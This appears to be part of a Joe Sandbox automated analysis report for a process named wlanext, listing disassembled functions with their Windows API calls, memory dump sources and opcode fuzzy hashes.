                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,-00000030,00000000,00000004,00000000,?,?,00000000,00000000,00000000), ref: 00FEF672
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF686
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID:
                                            • API String ID: 1706616652-0
                                            • Opcode ID: 19aee3abbd202c46b307346320eda3b9d8d36908a9d0705f85b2dadc5bac7c78
                                            • Instruction ID: 086c513cabd32dac898de6dcdf354d933d75a60fa6c48efe959ab935f1e126f9
                                            • Opcode Fuzzy Hash: 19aee3abbd202c46b307346320eda3b9d8d36908a9d0705f85b2dadc5bac7c78
                                            • Instruction Fuzzy Hash: AF316B75A00616AFCB10DF69C880B6ABBF8FF48320F1441A9E908EB351E734E915DBD0
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF50E
                                            • memcpy.MSVCRT ref: 00FEF559
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000004,00000000,-00000014,?,00000000,00000000), ref: 00FEF584
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF598
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID:
                                            • API String ID: 1706616652-0
                                            • Opcode ID: 074539ab3edf5aa945e593698f77b7d91c675ef13509186e7611481e6ba1fd2f
                                            • Instruction ID: 187e60ff39abac69085a1d7dae4666e3910ef17b8749c89a3bd8d9793ff22dc7
                                            • Opcode Fuzzy Hash: 074539ab3edf5aa945e593698f77b7d91c675ef13509186e7611481e6ba1fd2f
                                            • Instruction Fuzzy Hash: 5B31A075A00305AFCB20DF69C880B6EB7F4EF58314F148469E918EB311E775E906DB90
                                            APIs
                                            • GetCurrentThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000008,00000001,00000000,00000000,00000000,?,?,?,00FEB798), ref: 00FEB68B
                                            • OpenThreadToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00FEB798), ref: 00FEB692
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00FEB798), ref: 00FEB69C
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?,00FEB798), ref: 00FEB6D6
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Thread$CloseCurrentErrorHandleLastMessageOpenTokenTrace
                                            • String ID:
                                            • API String ID: 3986309575-0
                                            • Opcode ID: c3d6a728bd5a15d76efdf4f1c2502772274c4c423a02ac354d6c30d5b9064d9f
                                            • Instruction ID: a9f81df7d63bb55c154de00cc1734e466a3fe4d0c2e94d6b69f122db950d1560
                                            • Opcode Fuzzy Hash: c3d6a728bd5a15d76efdf4f1c2502772274c4c423a02ac354d6c30d5b9064d9f
                                            • Instruction Fuzzy Hash: 4C210A31600284ABDB295F16DD48B767B5BEF84354F380099F9018A2A5CB76CD42F754
                                            APIs
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000008,00000000,00000000,00000000,00000000,?), ref: 00FEB5C6
                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000), ref: 00FEB5CD
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEB5D7
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00FEB611
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Process$CloseCurrentErrorHandleLastMessageOpenTokenTrace
                                            • String ID:
                                            • API String ID: 3604925983-0
                                            • Opcode ID: 65ca6cc8470c8a8f33bff009f68b3e66b969256781da99c72b2651c9549ff68c
                                            • Instruction ID: f55b396955a5d74e113c4db605afd37ac90cb32f30d2bab5963cefcf3cf3d1b1
                                            • Opcode Fuzzy Hash: 65ca6cc8470c8a8f33bff009f68b3e66b969256781da99c72b2651c9549ff68c
                                            • Instruction Fuzzy Hash: D821CC31600388ABDB294F569C09B777BAAEF44368F38009DF501962A5DB76CD42FB64
                                            APIs
                                              • Part of subcall function 00FEFDA8: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00FEFDAF
                                            • __set_app_type.MSVCRT ref: 00FEF9D2
                                            • __p__fmode.MSVCRT ref: 00FEF9E8
                                            • __p__commode.MSVCRT ref: 00FEF9F6
                                            • __setusermatherr.MSVCRT ref: 00FEFA17
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                            • String ID:
                                            • API String ID: 1632413811-0
                                            • Opcode ID: 99acadf5dfda5119ab058d4aef124d0a0d1b31d8687b039174c745cfcfbcb996
                                            • Instruction ID: 780e8951fcf966c2413a62b345681a1250f2e121ec3fa7fc36421b7b2de6a23c
                                            • Opcode Fuzzy Hash: 99acadf5dfda5119ab058d4aef124d0a0d1b31d8687b039174c745cfcfbcb996
                                            • Instruction Fuzzy Hash: 5EF0AC7554038CDFC764AF31EC4EA383B68BF46722B200669E561862F5CF3A9489FA14
                                            APIs
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00FEDCE6), ref: 00FEDD11
                                            • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD21
                                            • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD32
                                            • memset.MSVCRT ref: 00FEDD3D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalDeleteSection$CloseHandlememset
                                            • String ID:
                                            • API String ID: 3880144888-0
                                            • Opcode ID: b27ca78ecdb249b5eb559d7ad4194a67289424e7e2031b904d8761df51fdc207
                                            • Instruction ID: e8cf56f74f947285f044de03ac3618087a2a281a7a07c2de8bf7b4f8660595b6
                                            • Opcode Fuzzy Hash: b27ca78ecdb249b5eb559d7ad4194a67289424e7e2031b904d8761df51fdc207
                                            • Instruction Fuzzy Hash: 0AE092728027149BC7B05B25AE48B6773FCBF51321F400419F146D6850CB74F804DA55
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 3942aac2583ff9d43276758a3f12e2016ad3938dae789eb1854f9ed7c4d64df2
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: A8918FB0E0021A9BDB24DE69C981AFEB7B5FF46720F18451EE865E73C0E7309941CB64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 60f787dec27391b52784cc1d5748418c9c0ea7270457eb1cba60d976a9d7d1cf
                                            • Instruction ID: 3fa88028f9813033669f795987b1d66470458f024c359fe35adcae122278f961
                                            • Opcode Fuzzy Hash: 60f787dec27391b52784cc1d5748418c9c0ea7270457eb1cba60d976a9d7d1cf
                                            • Instruction Fuzzy Hash: 73815975D006699BDB31DF54CC44BEEB7B8AB48710F0445EAEA19B7290D7309E84CFA4
                                            APIs
                                              • Part of subcall function 00FE5CD6: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE5D2E
                                              • Part of subcall function 00FE5CD6: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,00000000,00000000), ref: 00FE60D4
                                            • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,?,?,?,00000000,00000000), ref: 00FE687E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE6888
                                              • Part of subcall function 00FE5764: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,?,0000000A,?,00000004,00000000), ref: 00FE57B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterErrorEventLastLeaveMessageTrace
                                            • String ID: InitService
                                            • API String ID: 2753720420-1647998688
                                            • Opcode ID: 0414b2defdc1531d22db67f9794c573ebbdb4b7cbf1360e135edbf01bb3fa8ac
                                            • Instruction ID: cbd2a3e7adf968be003c7ab4c8377aa9b3b3b6e655364536c7558d3a6d637e09
                                            • Opcode Fuzzy Hash: 0414b2defdc1531d22db67f9794c573ebbdb4b7cbf1360e135edbf01bb3fa8ac
                                            • Instruction Fuzzy Hash: A341E3319043899BC725DF26C840B6F7BE5EF983A4F10052DF8449B292DB35CD42EB92
                                            APIs
                                            • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF13D0,00000183,00000000,00FF13CC,00000001,00FF13CC,?,00FE8F3B,00FF13CC,00000000,00FF1000,00FE9404,?,?,?,00FE3991), ref: 00FEDF3A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalDeleteSection
                                            • String ID: HtDestroyHandleTable$L2Ht
                                            • API String ID: 166494926-2242761165
                                            • Opcode ID: 7e1072fe9b8da4ca6ad60ecec76bfa3b61a1057036375ee147a881857a7a7a0b
                                            • Instruction ID: cb0ff26a899bdfd8210ea681c8b6fb9a00afaafb66ad8e86bb876856ca91aaf1
                                            • Opcode Fuzzy Hash: 7e1072fe9b8da4ca6ad60ecec76bfa3b61a1057036375ee147a881857a7a7a0b
                                            • Instruction Fuzzy Hash: BF218832A007819BD730CF1AD884A16B3E6FF847247244A2DD16B8BA95CB70FC45DB50
                                            APIs
                                              • Part of subcall function 00FEDD48: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00FE1A24,?,00FE9CD7,00000000,?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD4F
                                              • Part of subcall function 00FEDD48: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD59
                                              • Part of subcall function 00FEDD48: ResetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD6F
                                              • Part of subcall function 00FEDD48: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD76
                                              • Part of subcall function 00FEDD48: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD7D
                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,SendPacket), ref: 00FEEF7B
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEEF85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ErrorEventFileLastResetWrite
                                            • String ID: SendPacket
                                            • API String ID: 1802692274-2548714312
                                            • Opcode ID: 9f4151c42623801b8bf25959c5511ab1e673f1f2dd1c2b7e59e94e9ea75d8f95
                                            • Instruction ID: a32091a2092f29fd7e4a802e9c4a7a459188087418dddd3c41fc250ab2344925
                                            • Opcode Fuzzy Hash: 9f4151c42623801b8bf25959c5511ab1e673f1f2dd1c2b7e59e94e9ea75d8f95
                                            • Instruction Fuzzy Hash: 2111B672D001D9EFDB22AF96ED818BEBB7AEF94360B140039E80567251CB348E11F790
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,80001000,HtCreateHandleTable,00000106,00FF13CC,00000000,00000001,0000000F,0000000F,?,00FE8E38,00FF13CC,?,00FE35F4), ref: 00FEDE15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpin
                                            • String ID: HtCreateHandleTable
                                            • API String ID: 2593887523-3622291215
                                            • Opcode ID: e8efd632071f2a62f0353d59f35f2fcd0732efc946b45647dbc5ba0f75e6ec23
                                            • Instruction ID: b6557f77981b31998cd4ddc3e017e509dd4608e9163d662d8a311e5482de9050
                                            • Opcode Fuzzy Hash: e8efd632071f2a62f0353d59f35f2fcd0732efc946b45647dbc5ba0f75e6ec23
                                            • Instruction Fuzzy Hash: 6511E772A40345ABE7308F66DC49B97B7E8EF54B60F20091DB2569B5C0D7B0E904EB90
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE8637
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE8648
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE865B
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE86DC
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$MessageTrace
                                            • String ID:
                                            • API String ID: 3323410425-0
                                            • Opcode ID: ac542b779f58a2c46ec609e6330c92516d4dcd8a90a3b0cd65504fed85c2e819
                                            • Instruction ID: 25e594f1830626010d6994a020abea75aae1f830813f7801c38b89b077c3e21d
                                            • Opcode Fuzzy Hash: ac542b779f58a2c46ec609e6330c92516d4dcd8a90a3b0cd65504fed85c2e819
                                            • Instruction Fuzzy Hash: C731D3715002C4ABD725AF169C44F267A56BF403E5F290094F50A9B2BACE76CC42FB95
                                            APIs
                                              • Part of subcall function 00FEDD86: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000040,00000000,00FE9BFF,?,00000000,00000000,00FE304B,00000002,00000000,?,00000000), ref: 00FEDD8C
                                              • Part of subcall function 00FEDD86: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000,00FE304B,00000002,00000000,?,00000000), ref: 00FEDD92
                                              • Part of subcall function 00FEDD86: WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,00000000,00000000,00FE304B,00000002,00000000,?,00000000), ref: 00FEDDA0
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00FF1000,00FEC479,0000000C,00000000,?,00FE3E0C,?,?,?,00FE3991,00001388,00001388), ref: 00FEE796
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE3E0C,?,?,?,00FE3991,00001388,00001388), ref: 00FEE7DB
                                              • Part of subcall function 00FEEE0D: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,00FE2774,00FEE7A9,?,00FE3E0C,?,?,?,00FE3991,00001388,00001388), ref: 00FEEE45
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Leave$CurrentEnterObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 1901038851-0
                                            • Opcode ID: 6cbd46d187bb22728de14ea840d4739360d58722c4caaab9f6cb23f383249e2a
                                            • Instruction ID: dda6c13486a6a087496409dd2870a0035f4b53c08c44546de97b852005667924
                                            • Opcode Fuzzy Hash: 6cbd46d187bb22728de14ea840d4739360d58722c4caaab9f6cb23f383249e2a
                                            • Instruction Fuzzy Hash: 65F0B27A5411A8CFC366EF56FE48AB97B6EFF59B167000049E211872A5CF341880FFA5
                                            APIs
                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF94E
                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,?,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF95C
                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF96A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorHeapLast$AllocProcess
                                            • String ID:
                                            • API String ID: 4104531043-0
                                            • Opcode ID: 59f7d5979112be3c53ef2ae457312a8e3ad1ce53258d8bab09d9dbb7346aea75
                                            • Instruction ID: 80dac394698255712debd6cc4705147e6527970606d8d0898725f85d07155aa7
                                            • Opcode Fuzzy Hash: 59f7d5979112be3c53ef2ae457312a8e3ad1ce53258d8bab09d9dbb7346aea75
                                            • Instruction Fuzzy Hash: E2E01A33A42665B7C77117766C08B2B6969AFD4BA2F124025B985E62A0CE60C805F6B1